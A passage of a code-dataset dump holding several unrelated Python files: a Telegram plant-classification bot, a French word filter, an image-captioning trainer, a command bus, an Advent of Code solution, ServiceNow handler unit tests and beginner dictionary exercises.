'Lonicera_maacki',\r\n 'Lycopus_americanus', 'Lysimachia_nummularia', 'Maclura_pomifera', 'Malus_angustifolia', 'Melilotus_alba',\r\n 'Melilotus_albus', 'Menispermum_canadense', 'Mertensia_virginiana', 'Microstegium_vimineum',\r\n 'Mitchella_repens', 'Mollugo_verticillata', 'Ostrya_virginiana', 'Oxalis_stricta', 'Paronychia_canadensis',\r\n 'Parthenocissus_quinquefolia', 'Passiflora_lutea', 'Penthorum_sedoides', 'Perilla_frutescens',\r\n 'Phacelia_ranunculacea', 'Phlox_divaricata', 'Phytolacca_americana', 'Pilea_pumila', 'Platanus_occidentalis',\r\n 'Podophyllum_peltatum', 'Polygonatum_biflorum', 'Polygonum_cespitosum', 'Polygonum_cuspidatum',\r\n 'Polygonum_lapathifolium', 'Polygonum_perfoliatum', 'Polygonum_punctatum', 'Polygonum_virginianum',\r\n 'Polymnia_uvedalia', 'Polypodium_virginianum', 'Polystichum_acrostichoides', 'Portulaca_oleracea',\r\n 'Potentilla_canadensis', 'Prunus_serotina', 'Ptelea_trifoliata', 'Quercus_alba', 'Quercus_montana',\r\n 'Quercus_rubra', 'Ranunculus_arbortivus', 'Ranunculus_recurvatus', 'Robinia_pseudoacacia', 'Rosa_multiflora',\r\n 'Rubus_flagellaris', 'Rubus_phoenicolasius', 'Rudbeckia_laciniata', 'Rumex_altissimus', 'Sambucus_canadensis',\r\n 'Saponaria_officinalis', 'Saururus_cernuus', 'Saxifraga_virginiensis', 'Scrophularia_marilandica',\r\n 'Sedum_ternatum', 'Senecio_aureus', 'Setaria_faberi', 'Setaria_viridis', 'Sida_spinosa', 'Silene_latifolia',\r\n 'Silene_stellata', 'Smilacina_racemosa', 'Smilax_glauca', 'Smilax_rotundifolia', 'Solanum_carolinense',\r\n 'Solanum_nigrum', 'Solidago_caesia', 'Solidago_flexicaulis', 'Solidago_ulmifolia', 'Staphylea_trifolia',\r\n 'Stellaria_media', 'Stellaria_pubera', 'Symphoricarpos_orbiculatus', 'Tanacetum_vulgare',\r\n 'Teucrium_canadense', 'Tilia_americana', 'Toxicodendron_radicans', 'Tradescantia_virginiana',\r\n 'Trillium_sessile', 'Ulmus_americana', 'Ulmus_rubra', 'Urtica_dioica', 'Uvularia_sessilifolia',\r\n 'Vaccinium_pallidum', 'Vaccinium_stamineum', 'Verbena_hastata', 'Verbena_urticifolia',\r\n 'Verbesina_alternifolia', 'Vernonia_noveboracensis', 'Veronica_hederifolia', 'Viburnum_prunifolium',\r\n 'Viola_sororia', 'Viola_striata', 'Vitis_riparia', 'Xanthium_strumarium', 'Zizia_aurea']\r\n\r\n\r\ndef preprocess(img):\r\n print(\"entered preprocessing\")\r\n h, w, ch = img.shape\r\n sz = max(h, w)\r\n result = [[[255, 255, 255] for _ in range(sz)] for _ in range(sz)]\r\n if sz > h:\r\n for it in range(sz - h):\r\n for j in range(sz):\r\n result[h + it][j] = list(img[-1][j])\r\n else:\r\n for it in range(h):\r\n for j in range(sz - w):\r\n result[it][-j - 1] = list(img[it][-1])\r\n for it in range(h):\r\n for j in range(w):\r\n result[it][j] = list(img[it][j])\r\n print(\"resizing done\")\r\n result = np.array(result, dtype='uint8')\r\n result = cv2.cvtColor(result, cv2.COLOR_BGR2RGB)\r\n result = Image.fromarray(result).resize((224, 224))\r\n fout = \"W:/bot/image2.jpg\"\r\n imageio.imwrite(fout, result)\r\n\r\n\r\ndef classify(img_path):\r\n print(\"entered classify\")\r\n img = image.load_img(img_path, target_size=(224, 224))\r\n img_array = image.img_to_array(img)\r\n img_batch = np.expand_dims(img_array, axis=0)\r\n img_preprocessed = preprocess_input(img_batch)\r\n prediction = model.predict(img_preprocessed)\r\n n = 5\r\n y_preds = np.argsort(prediction, axis=1)[:,-n:]\r\n res = sorted(y_preds[0])\r\n resp = []\r\n links = []\r\n for i in res:\r\n resp.append(labels[i])\r\n for i in range(len(resp)):\r\n links.append(\"google.com/search?q=\")\r\n for k in range(len(resp[i])):\r\n if resp[i][k] == \"_\":\r\n links[i] += \"+\"\r\n else:\r\n links[i] += resp[i][k]\r\n result = \"\"\r\n for i in range(len(resp)):\r\n result += \"\" + resp[i] + \"\"\r\n if i != len(resp) - 1:\r\n result += \"\\n\"\r\n return result\r\n\r\n\r\n# Начало диалога\r\n@bot.message_handler(commands=['start'])\r\ndef start_message(message):\r\n handle_help(message)\r\n\r\n\r\n# Основное меню\r\n@bot.message_handler(commands=['help']) # Обрабатывает команду /help\r\ndef handle_help(message):\r\n bot.send_message(message.chat.id, \"Приветствую Вас, \" + message.from_user.first_name +\r\n \"!\\nОтправьте в диалог фотографию листа растения.\"\r\n \" В ответном сообщении будут указаны 5 наиболее вероятных названий данного вида на латыни.\")\r\n\r\n\r\n\r\n# Загрузка файла от пользователя\r\n@bot.message_handler(content_types=[\"photo\"])\r\ndef photo(message):\r\n print(\"photo received. Processing started.\")\r\n # print('message.photo =', message.photo)\r\n fileID = message.photo[-1].file_id\r\n # print('fileID =', fileID)\r\n file_info = bot.get_file(fileID)\r\n # print('file.file_path =', file_info.file_path)\r\n downloaded_file = bot.download_file(file_info.file_path)\r\n with open(\"W:/bot/image.jpg\", 'wb') as new_file:\r\n new_file.write(downloaded_file)\r\n img = cv2.imread(\"W:/bot/image.jpg\")\r\n preprocess(img)\r\n print(\"file preprocessed and saved\")\r\n response = classify(\"W:/bot/image2.jpg\")\r\n print(\"classified, responce:\\n\", response)\r\n # bot.reply_to(message, response)\r\n # bot.reply_to(message, text=response, parse_mode=ParseMode.HTML)\r\n bot.send_message(message.chat.id, text=response, parse_mode=\"HTML\", disable_web_page_preview=True)\r\n\r\n\r\n@bot.message_handler(content_types=[\"sticker\", \"pinned_message\", \"document\", \"audio\", 'video', 'video_note', 'voice',\r\n 'location', 'contact', 'new_chat_members', 'left_chat_member', 'new_chat_title',\r\n 'new_chat_photo', 'delete_chat_photo', 'group_chat_created',\r\n 'supergroup_chat_created', \"text\",\r\n 'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id',\r\n 'pinned_message'])\r\ndef anthg(message):\r\n handle_help(message)\r\n\r\n\r\ntries = 0\r\nwhile tries < 10:\r\n try:\r\n print(\"trying\")\r\n bot.polling()\r\n except Exception as E:\r\n print(E.args)\r\n print(\"\\ndying...\")\r\n tries += 1\r\n time.sleep(1)\r\n","repo_name":"glebrogachyov/Plant_Classifier","sub_path":"PlantClassificationBot.py","file_name":"PlantClassificationBot.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33476384199","text":"import argparse\nimport logging\nfrom pathlib import Path\nfrom typing import Tuple\nfrom tqdm import tqdm\nimport mlconjug3\n\n#################################\n# config\n#################################\n\nverbs_file = \"data/verbs.txt\"\nnouns_file = \"data/nouns.txt\"\nwords_file = \"../data/words.txt\"\noutput_file = \"../data/words_filtered.txt\"\n\n# logging \nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)\n\n#################################\n# main\n#################################\n\nclass VerbConjugator():\n \"\"\"\n Conjugates a verb at differents moods (default=all)\n \"\"\"\n\n def __init__(self, lang=\"fr\") -> None:\n self.conjugator = mlconjug3.Conjugator(language=lang)\n\n def conjugate_verb(self, verb:str, moods:Tuple[str]=None) -> Tuple[str]:\n\n if not self.conjugator.conjug_manager.is_valid_verb(verb):\n return None\n\n conjugated_list = []\n try:\n conjugated_verb = self.conjugator.conjugate(verb)\n if conjugated_verb == None:\n return None\n\n for conjugate_form in conjugated_verb.iterate():\n conjugated = conjugate_form[-1]\n if conjugated != verb and conjugated not in conjugated_list:\n mood = conjugate_form[0]\n if (moods == None) or (moods != None and (mood in moods)):\n conjugated_list.append(conjugated)\n\n return conjugated_list\n\n except:\n return None\n\ndef main():\n\n # args\n parser = argparse.ArgumentParser(description='list tweets from Twitter API')\n parser.add_argument('-v', '--verbose', action='store_true', help=\"verbose mode\")\n args = parser.parse_args()\n logging.debug(args)\n\n script_dir = Path(__file__).resolve().parent\n\n # load verbs\n print(\"loading verbs\")\n verbs_file = script_dir / Path(verbs_file)\n with open(str(verbs_file), \"r\") as f:\n verbs = [line.rstrip() for line in f]\n\n # load nouns\n print(\"loading nouns\")\n nouns_file = script_dir / Path(nouns_file)\n with open(str(nouns_file), \"r\") as f:\n nouns = [line.rstrip() for line in f]\n\n # conjugate verbs\n print(\"conjugating verbs\")\n conjugator = VerbConjugator(\"fr\")\n moods = ['Indicatif', 'Conditionnel', 'Subjonctif']\n conjugated_verbs = []\n not_conjugated_verbs = []\n for verb in tqdm(verbs):\n conjugated_list = conjugator.conjugate_verb(verb, moods)\n if conjugated_list != None:\n conjugated_verbs += conjugated_list\n else:\n not_conjugated_verbs.append(verb)\n\n if len(not_conjugated_verbs) > 0:\n logging.warning(\"warning : could not conjugate following verbs: {}\".format(\", \".join(not_conjugated_verbs)))\n\n # load words\n print(\"loading words\")\n words_file = script_dir / Path(words_file)\n with open(str(words_file), \"r\") as f:\n words = [line.rstrip() for line in f]\n \n # process words\n print(\"filtering words\")\n words_filtered = []\n words_filtered_file = script_dir / Path(output_file)\n with open(str(words_filtered_file), \"w\") as f:\n for word in tqdm(words):\n if (word not in conjugated_verbs) or (word in nouns):\n f.write(\"{}\\n\".format(word))\n\n print(\"#%s words found\" % len(words))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"arthurcouyere/twitter-bot","sub_path":"tools/word_tools.py","file_name":"word_tools.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33862982891","text":"import datetime\nimport os\nimport pickle\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport sacrebleu\nimport torch.utils.data as data_utils\nfrom IPython.core import ultratb\n\nimport dataset\nfrom faster_rcnn_feats import *\nfrom image_model import ImageCaptioning, ImageMassSeq2Seq\nfrom option_parser import get_img_options_parser\nfrom seq2seq import Seq2Seq\nfrom seq_gen import get_outputs_until_eos\nfrom textprocessor import TextProcessor\nfrom train_image_mt import ImageMTTrainer, get_lex_dict\nfrom utils import build_optimizer, backward\n\nsys.excepthook = ultratb.FormattedTB(mode='Verbose', color_scheme='Linux', call_pdb=False)\n\n\nclass ImageCaptionTrainer(ImageMTTrainer):\n def train_epoch(self, img_data_iter: List[data_utils.DataLoader], step: int, saving_path: str = None,\n img_dev_data_iter: List[data_utils.DataLoader] = None, max_step: int = 300000,\n lex_dict=None, accum=1, mt_train_iter: List[data_utils.DataLoader] = None,\n mt_dev_iter: List[data_utils.DataLoader] = None, mtl_weight=0.1, **kwargs):\n \"Standard Training and Logging Function\"\n start = time.time()\n total_tokens, total_loss, tokens, cur_loss = 0, 0, 0, 0\n cur_loss = 0\n batch_zip, shortest = self.get_batch_zip(img_data_iter, None, mt_train_iter)\n\n model = (\n self.model.module if hasattr(self.model, \"module\") else self.model\n )\n for i, batches in enumerate(batch_zip):\n for batch in batches:\n try:\n is_img_batch = isinstance(batch, list) and \"captions\" in batch[0]\n if is_img_batch: # Captioning training data.\n captions = [b[\"captions\"] for b in batch]\n caption_pad_mask = [b[\"caption_mask\"] for b in batch]\n proposals = [b[\"proposal\"] for b in batch] if lex_dict is not None else None\n langs = [b[\"langs\"] for b in batch]\n if len(batch) < self.num_gpu:\n continue\n\n predictions = self.model(tgt_inputs=captions,\n tgt_mask=caption_pad_mask,\n pad_idx=model.text_processor.pad_token_id(),\n tgt_langs=langs, batch=batch, proposals=proposals,\n log_softmax=True)\n targets = torch.cat(list(map(lambda c: c[:, 1:].contiguous().view(-1), captions)))\n tgt_mask_flat = torch.cat(list(map(lambda c: c[:, 1:].contiguous().view(-1), caption_pad_mask)))\n targets = targets[tgt_mask_flat]\n else: # MT data!\n src_inputs = batch[\"src_texts\"].squeeze(0)\n src_mask = batch[\"src_pad_mask\"].squeeze(0)\n tgt_inputs = batch[\"dst_texts\"].squeeze(0)\n tgt_mask = batch[\"dst_pad_mask\"].squeeze(0)\n src_langs = batch[\"src_langs\"].squeeze(0)\n dst_langs = batch[\"dst_langs\"].squeeze(0)\n proposals = batch[\"proposal\"].squeeze(0) if lex_dict is not None else None\n if src_inputs.size(0) < self.num_gpu:\n continue\n predictions = self.model(src_inputs=src_inputs, tgt_inputs=tgt_inputs,\n src_pads=src_mask, tgt_mask=tgt_mask, src_langs=src_langs,\n tgt_langs=dst_langs, proposals=proposals,\n pad_idx=model.text_processor.pad_token_id(), log_softmax=True)\n targets = tgt_inputs[:, 1:].contiguous().view(-1)\n tgt_mask_flat = tgt_mask[:, 1:].contiguous().view(-1)\n targets = targets[tgt_mask_flat]\n ntokens = targets.size(0)\n\n if ntokens > 0:\n if self.num_gpu == 1:\n targets = targets.to(predictions.device)\n\n loss = self.criterion(predictions, targets).mean()\n weight = 1 if is_img_batch else mtl_weight\n backward(loss * weight, self.optimizer, self.fp16)\n\n loss = float(loss.data) * ntokens\n tokens += ntokens\n total_tokens += ntokens\n total_loss += loss\n cur_loss += loss\n\n # We accumulate the gradients for both tasks!\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.clip)\n step += 1\n\n if step % accum == 0:\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n if step % 50 == 0 and tokens > 0:\n elapsed = time.time() - start\n print(datetime.datetime.now(),\n \"Epoch Step: %d Loss: %f Tokens per Sec: %f \" % (\n step, cur_loss / tokens, tokens / elapsed))\n\n if step % 500 == 0:\n if img_dev_data_iter is not None and step % 5000 == 0:\n bleu = self.eval_bleu(img_dev_data_iter, saving_path)\n print(\"Captioning BLEU:\", bleu)\n if mt_dev_iter is not None and step % 5000 == 0:\n bleu = super().eval_bleu(mt_dev_iter, saving_path)\n print(\"MT BLEU:\", bleu)\n\n model.save(saving_path + \".latest\")\n with open(os.path.join(saving_path + \".latest\", \"optim\"), \"wb\") as fp:\n pickle.dump(self.optimizer, fp)\n\n start, tokens, cur_loss = time.time(), 0, 0\n\n if step >= max_step:\n break\n if i == shortest - 1:\n break\n except RuntimeError as err:\n print(repr(err))\n torch.cuda.empty_cache()\n\n try:\n if img_dev_data_iter is not None:\n bleu = self.eval_bleu(img_dev_data_iter, saving_path)\n print(\"Captioning BLEU:\", bleu)\n if mt_dev_iter is not None:\n bleu = super().eval_bleu(mt_dev_iter, saving_path)\n print(\"MT BLEU:\", bleu)\n\n print(\"Total loss in this epoch: %f\" % (total_loss / total_tokens))\n model.save(saving_path + \".latest\")\n except RuntimeError as err:\n print(repr(err))\n\n return step\n\n def eval_bleu(self, dev_data_iter, saving_path):\n mt_output = []\n mt_ids = []\n model = (\n self.model.module if hasattr(self.model, \"module\") else self.model\n )\n model.eval()\n\n with torch.no_grad():\n for iter in dev_data_iter:\n for batch in iter:\n proposals = [b[\"proposal\"] for b in batch]\n dst_langs = [b[\"langs\"] for b in batch]\n img_ids = [b[\"img_ids\"] for b in batch][0]\n first_tokens = [b[\"first_tokens\"] for b in batch]\n images = [b[\"images\"] for b in batch]\n max_len = [b[\"max_len\"] for b in batch][0]\n outputs = self.generator(images=images, first_tokens=first_tokens, tgt_langs=dst_langs,\n pad_idx=model.text_processor.pad_token_id(), proposals=proposals,\n max_len=max_len)\n if self.num_gpu > 1:\n new_outputs = []\n for output in outputs:\n new_outputs += output\n outputs = new_outputs\n\n mt_output += list(map(lambda x: model.text_processor.tokenizer.decode(x[1:].numpy()), outputs))\n mt_ids += img_ids\n model.train()\n references = list(map(lambda id: self.caption_reference[id], mt_ids))\n max_reflen = max(map(lambda x: len(x), references))\n all_refs = list(map(lambda l: list(map(lambda r: r[l] if l < len(r) else None, references)), range(max_reflen)))\n bleu = sacrebleu.corpus_bleu(mt_output, all_refs, lowercase=True, tokenize=\"intl\")\n\n output = \"\\n\".join([\"\\nOutput:\\n\" + o + \"\\n\\nReferences:\\n\" + \"\\n\".join(\n self.caption_reference[mt_ids[i]]) + \"\\n\\n***************\\n\" for i, o in enumerate(mt_output)])\n with open(os.path.join(saving_path, \"bleu.caption.output\"), \"w\") as writer:\n writer.write(output)\n\n if bleu.score > self.best_bleu:\n self.best_bleu = bleu.score\n print(\"Saving best BLEU\", self.best_bleu)\n model.save(saving_path)\n with open(os.path.join(saving_path, \"optim\"), \"wb\") as fp:\n pickle.dump(self.optimizer, fp)\n\n with open(os.path.join(saving_path, \"bleu.caption.best.output\"), \"w\") as writer:\n writer.write(output)\n\n return bleu.score\n\n @staticmethod\n def train(options):\n lex_dict = None\n if options.dict_path is not None:\n lex_dict = get_lex_dict(options.dict_path)\n if not os.path.exists(options.model_path):\n os.makedirs(options.model_path)\n\n text_processor = TextProcessor(options.tokenizer_path)\n assert text_processor.pad_token_id() == 0\n\n if options.pretrained_path is not None:\n caption_model = Seq2Seq.load(ImageCaptioning, options.pretrained_path, tok_dir=options.tokenizer_path)\n else:\n caption_model = ImageCaptioning(use_proposals=lex_dict is not None, tie_embed=options.tie_embed,\n text_processor=text_processor, resnet_depth=options.resnet_depth,\n lang_dec=options.lang_decoder, enc_layer=options.encoder_layer,\n dec_layer=options.decoder_layer, embed_dim=options.embed_dim,\n intermediate_dim=options.intermediate_layer_dim, use_obj=not options.no_obj)\n\n if options.lm_path is not None: # In our case, this is an MT model.\n mt_pret_model = Seq2Seq.load(ImageMassSeq2Seq, options.lm_path, tok_dir=options.tokenizer_path)\n assert len(caption_model.encoder.encoder.layer) == len(mt_pret_model.encoder.encoder.layer)\n assert len(caption_model.decoder.decoder.layer) == len(mt_pret_model.decoder.decoder.layer)\n caption_model.encoder = mt_pret_model.encoder\n caption_model.decoder = mt_pret_model.decoder\n caption_model.output_layer = mt_pret_model.output_layer\n\n print(\"Model initialization done!\")\n\n # We assume that the collator function returns a list with the size of number of gpus (in case of cpus,\n collator = dataset.ImageTextCollator()\n num_batches = max(1, torch.cuda.device_count())\n\n if options.continue_train:\n with open(os.path.join(options.pretrained_path, \"optim\"), \"rb\") as fp:\n optimizer = pickle.load(fp)\n else:\n optimizer = build_optimizer(caption_model, options.learning_rate, warump_steps=options.warmup)\n trainer = ImageCaptionTrainer(model=caption_model, mask_prob=options.mask_prob, optimizer=optimizer,\n clip=options.clip,\n beam_width=options.beam_width, max_len_a=options.max_len_a,\n max_len_b=options.max_len_b, len_penalty_ratio=options.len_penalty_ratio,\n fp16=options.fp16, mm_mode=options.mm_mode)\n\n pin_memory = torch.cuda.is_available()\n img_train_loader = ImageMTTrainer.get_img_loader(collator, dataset.ImageCaptionDataset, options.train_path,\n caption_model, num_batches, options, pin_memory,\n lex_dict=lex_dict, shuffle=(options.local_rank < 0))\n num_processors = max(torch.cuda.device_count(), 1) if options.local_rank < 0 else 1\n mt_train_loader = None\n if options.mt_train_path is not None:\n mt_train_loader = ImageMTTrainer.get_mt_train_data(caption_model, num_processors, options, pin_memory,\n lex_dict=lex_dict)\n\n img_dev_loader = ImageMTTrainer.get_img_loader(collator, dataset.ImageCaptionTestDataset, options.dev_path,\n caption_model, num_batches, options, pin_memory,\n lex_dict=lex_dict,\n shuffle=False, denom=2)\n\n trainer.caption_reference = None\n if img_dev_loader is not None:\n trainer.caption_reference = defaultdict(list)\n generator = (\n trainer.generator.module if hasattr(trainer.generator, \"module\") else trainer.generator\n )\n for data in img_dev_loader:\n for batch in data:\n for b in batch:\n captions = b[\"captions\"]\n for id in captions:\n for caption in captions[id]:\n refs = get_outputs_until_eos(text_processor.sep_token_id(), caption,\n remove_first_token=True)\n ref = [generator.seq2seq_model.text_processor.tokenizer.decode(ref.numpy()) for ref in\n refs]\n trainer.caption_reference[id] += ref\n print(\"Number of dev image/captions\", len(trainer.caption_reference))\n\n mt_dev_loader = None\n if options.mt_dev_path is not None:\n mt_dev_loader = ImageMTTrainer.get_mt_dev_data(caption_model, options, pin_memory, text_processor, trainer,\n lex_dict=lex_dict)\n print(\"Number of dev sentences\", len(trainer.reference))\n\n step, train_epoch = 0, 1\n while options.step > 0 and step < options.step:\n print(\"train epoch\", train_epoch)\n step = trainer.train_epoch(img_data_iter=img_train_loader, img_dev_data_iter=img_dev_loader,\n max_step=options.step, lex_dict=lex_dict, mt_train_iter=mt_train_loader,\n saving_path=options.model_path, step=step, accum=options.accum,\n mt_dev_iter=mt_dev_loader, mtl_weight=options.mtl_weight)\n train_epoch += 1\n\n\nif __name__ == \"__main__\":\n parser = get_img_options_parser()\n (options, args) = parser.parse_args()\n print(options)\n ImageCaptionTrainer.train(options=options)\n print(\"Finished Training!\")\n","repo_name":"rasoolims/ImageTranslate","sub_path":"src/train_captioning.py","file_name":"train_captioning.py","file_ext":"py","file_size_in_byte":15519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"24402686020","text":"from typing import Any, TypeVar\n\nfrom .exception import CommandHandlerDoesNotExistException\n\nReturnType = TypeVar('ReturnType')\n\nclass CommandBus:\n\n def execute(self, cmd, providers: dict[Any, Any] = {}):\n Handler = cmd.__handler__\n\n if Handler is None:\n raise CommandHandlerDoesNotExistException()\n\n result = Handler(**providers).execute(cmd)\n return result","repo_name":"cafadev/turbobus","sub_path":"turbobus/bus.py","file_name":"bus.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71460445928","text":"class Tower(object):\n def __init__(self):\n self.weight = 0\n self.parent = None\n self.children = []\n \n def __str__(self):\n return \"%d, %s, %s\" % (self.weight, self.parent, self.children)\n \ndef SumOfWeights(towers, name):\n sum = towers[name].weight\n for childName in towers[name].children:\n sum += SumOfWeights(towers, childName)\n \n return sum\n \n \ndef FindWrong(towers):\n wrongTower = None\n wrongWeight = 10**9\n for tower in towers:\n if (len(towers[tower].children) > 0):\n weight = SumOfWeights(towers, towers[tower].children[0])\n for childName in towers[tower].children:\n if (weight != SumOfWeights(towers, childName)):\n if (wrongWeight > weight):\n wrongTower = tower\n wrongWeight = weight\n \n return wrongTower\n\n\ndef main():\n with open(\"input\", \"r\") as file:\n input = file.readlines()\n \n towers = {}\n \n for line in input:\n line = line.strip().split(\" \")\n name = line[0]\n weight = int(line[1][1:-1])\n if (name not in towers):\n towers[name] = Tower()\n \n towers[name].weight = weight\n \n if (len(line) > 2):\n for i in range(3, len(line)):\n childName = line[i] if line[i][-1] != \",\" else line[i][:-1]\n if (childName not in towers):\n towers[childName] = Tower()\n \n towers[childName].parent = name\n towers[name].children.append(childName)\n \n # Part1. Top most tower\n for name, tower in towers.items():\n if (tower.parent == None):\n print(\"No parent: %s\" % (name))\n break\n \n # for tower in towers:\n # print(\"%s, %s, %d\" % (tower, towers[tower], SumOfWeights(towers, tower)))\n \n # Find wrong tower\n wrong = FindWrong(towers)\n print(wrong)\n\n # for childName in towers[wrong].children:\n # print(\"Sum: %d, Weight: %d, Name: %s\" % (SumOfWeights(towers, childName), towers[childName].weight, childName))\n \n # Find most common weight.\n weightDict = {}\n for childName in towers[wrong].children:\n sumWeight = SumOfWeights(towers, childName)\n if (sumWeight not in weightDict):\n weightDict[sumWeight] = 1\n else:\n weightDict[sumWeight] += 1\n \n # Sort weights and calculate wanted difference.\n sortedWeights = ([key for key in sorted(weightDict, key=weightDict.get, reverse=True)])\n weightDiff = sortedWeights[0] - sortedWeights[1]\n \n # Find which tower has wrong weight and subtract.\n for childName in towers[wrong].children:\n if (SumOfWeights(towers, childName) == sortedWeights[1]):\n print(towers[childName].weight + weightDiff)\n break\n \n \nif (__name__ == \"__main__\"):\n main()","repo_name":"Nesquick0/Adventofcode","sub_path":"2017/07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26479766787","text":"import requests\nimport pytest\nfrom os import environ\n\nfrom unittest.mock import MagicMock\nfrom runners.handlers import service_now\n\n\n@pytest.fixture\ndef with_oauth_envar():\n cid = environ.get('SA_SN_OAUTH_CLIENT_ID')\n if not cid:\n environ['SA_SN_OAUTH_CLIENT_ID'] = 'clientid'\n yield\n if not cid and 'SA_SN_OAUTH_CLIENT_ID' in environ:\n del environ['SA_SN_OAUTH_CLIENT_ID']\n\n\ndef test_handler_simpleauth():\n returned_mock = MagicMock(status_code=201)\n post_mock = MagicMock(return_value=returned_mock)\n backup_post = requests.post\n requests.post = post_mock\n\n try:\n sn_handle_return_value = service_now.handle({})\n finally:\n requests.post = backup_post\n\n post_mock.assert_called_once()\n assert sn_handle_return_value is returned_mock\n\n\ndef test_handler_oauth(with_oauth_envar):\n oauth_response = MagicMock(json=MagicMock(return_value={'access_token': '123'}))\n oauth_post = MagicMock(status_code=201, return_value=oauth_response)\n\n create_incident_post = MagicMock(\n status_code=201, json=MagicMock(return_value={'result': {'title': 'abc'}})\n )\n post_mock = MagicMock(side_effect=[oauth_post, create_incident_post])\n backup_post = requests.post\n requests.post = post_mock\n\n try:\n sn_handle_return_value = service_now.handle({'TITLE': 'abc'})\n finally:\n requests.post = backup_post\n\n assert post_mock.call_count == 2\n assert sn_handle_return_value is create_incident_post\n","repo_name":"snowflakedb/SnowAlert","sub_path":"src/runners/tests/unit/service_now_handler.py","file_name":"service_now_handler.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"53"} +{"seq_id":"70325587367","text":"# Exercise 1: Below are the two lists convert it into the dictionary\n# Output: {'Ten': 10, 'Twenty': 20, 'Thirty': 30}\nkeys = ['Ten', 'Twenty', 'Thirty']\nvalues = [10, 20, 30]\n\n# solution 1\ndct = dict()\nfor index in range(len(keys)):\n dct[keys[index]] = values[index]\n# solution 2\ndct = dict(zip(keys, values))\n\n\n# Exercise 2: Merge following two Python dictionaries into one\n# Output: {'Ten': 10, 'Twenty': 20, 'Thirty': 30, 'Fourty': 40, 'Fifty': 50\ndict1 = {'Ten': 10, 'Twenty': 20, 'Thirty': 30}\ndict2 = {'Thirty': 30, 'Fourty': 40, 'Fifty': 50}\n\n# Solution 1\ndict1.update(dict2)\n\n# Solution 2\nkeys = set(dict1.keys())\nkeys.update(dict2.keys())\ndct = dict()\nfor k in keys:\n dct[k] = dict1.get(k, None) or dict2.get(k, None)\nprint(dct)\n\n\n# Exercise 3: Access the value of key ‘history’ from the below\n# Output: 80\ndict_ex3 = {\n \"class\": {\n \"student\": {\n \"name\": \"Mike\",\n \"marks\": {\n \"physics\": 70,\n \"history\": 80\n }\n }\n }\n}\n\nprint(dict_ex3[\"class\"][\"student\"][\"marks\"][\"history\"])\nprint(dict_ex3.get(\"class\", {}).get(\"student\", {}).get(\"marks\", {}).get(\"history\", None))\n\n\n# Exercise 4: Create a new dictionary by extracting the following keys from a below dictionary\n# Output: {'name': 'Kelly', 'salary': 8000}\nkeys_to_extract = [\"name\", \"salary\"]\ndict_ex4 = {\n \"name\": \"Kelly\",\n \"age\": 25,\n \"salary\": 8000,\n \"city\": \"New york\"\n}\n\n# Solution 1\nres_ex4 = dict()\nfor key in keys_to_extract:\n res_ex4[key] = dict_ex4[key]\nprint(res_ex4)\n\n# Solution 2\nprint({k: v for k, v in dict_ex4.items() if k in keys_to_extract})\n\n\n# Exercise 5: Delete set of keys from a dictionary\n# Output: {'city': 'New york', 'age': 25}\nkeys_to_remove = [\"name\", \"salary\"]\ndict_ex5 = {\n \"name\": \"Kelly\",\n \"age\": 25,\n \"salary\": 8000,\n \"city\": \"New york\"\n}\n\n# Solution 1\nfor key in keys_to_remove:\n del dict_ex5[key]\nprint(dict_ex5)\n\n# Solution 2\nprint({k: v for k, v in dict_ex4.items() if k not in keys_to_remove})\n\n\n# Exercise 6: Check if a value 200 exists in a dictionary\n# Output: True\ndict_ex6 = {'a': 100, 'b': 200, 'c': 300}\n\n# Solution 1\nprint(200 in dict_ex6.values())\n\n# Solution 2\nexists = False\nfor value in dict_ex6.values():\n if value == 200:\n exists = True\n break\nprint(exists)\n\n\n# Exercise 7: Rename key city to location in the following dictionary\n# Output: {\n# \"name\": \"Kelly\",\n# \"age\":25,\n# \"salary\": 8000,\n# \"location\": \"New york\"\n# }\ndict_ex7 = {\n \"name\": \"Kelly\",\n \"age\": 25,\n \"salary\": 8000,\n \"city\": \"New york\"\n}\n\n# Solution 1\ndict_ex7[\"location\"] = dict_ex7.pop(\"city\")\n\n# Solution 2\ntemp = dict_ex7[\"city\"] # \"New york\"\ndel dict_ex7[\"city\"]\ndict_ex7[\"location\"] = temp\n\n\n# Exercise 8: Get the key of a minimum value from the following dictionary\n# Output: Math\ndict_ex8 = {\n 'Physics': 82,\n 'Math': 65,\n 'history': 75\n}\n\n# Solution 1\nmin_value_key = dict_ex8.keys()[0]\nmin_value = dict_ex8[min_value_key]\nfor k, v in dict_ex8.items():\n if v < min_value:\n min_value_key = k\n min_value = v\nprint(min_value_key)\nprint(min_value)\n\n\n# Exercise 9: Change Brad’s salary to 8500 from a given Python dictionary\n# Output: {\n# 'emp1': {'name': 'John', 'salary': 7500},\n# 'emp2': {'name': 'Emma', 'salary': 8000},\n# 'emp3': {'name': 'Brad', 'salary': 8500}\n# }\ndict_ex9 = {\n 'emp1': {'name': 'Jhon', 'salary': 7500},\n 'emp2': {'name': 'Emma', 'salary': 8000},\n 'emp3': {'name': 'Brad', 'salary': 6500}\n}\n\n# Solution 1\ndict_ex9[\"emp3\"][\"salary\"] = 8500\n\n# Solution 2\nfor key, employee in dict_ex9.items(): # (key, val)\n if employee['name'] == 'Brad':\n employee['salary'] = 8500\n 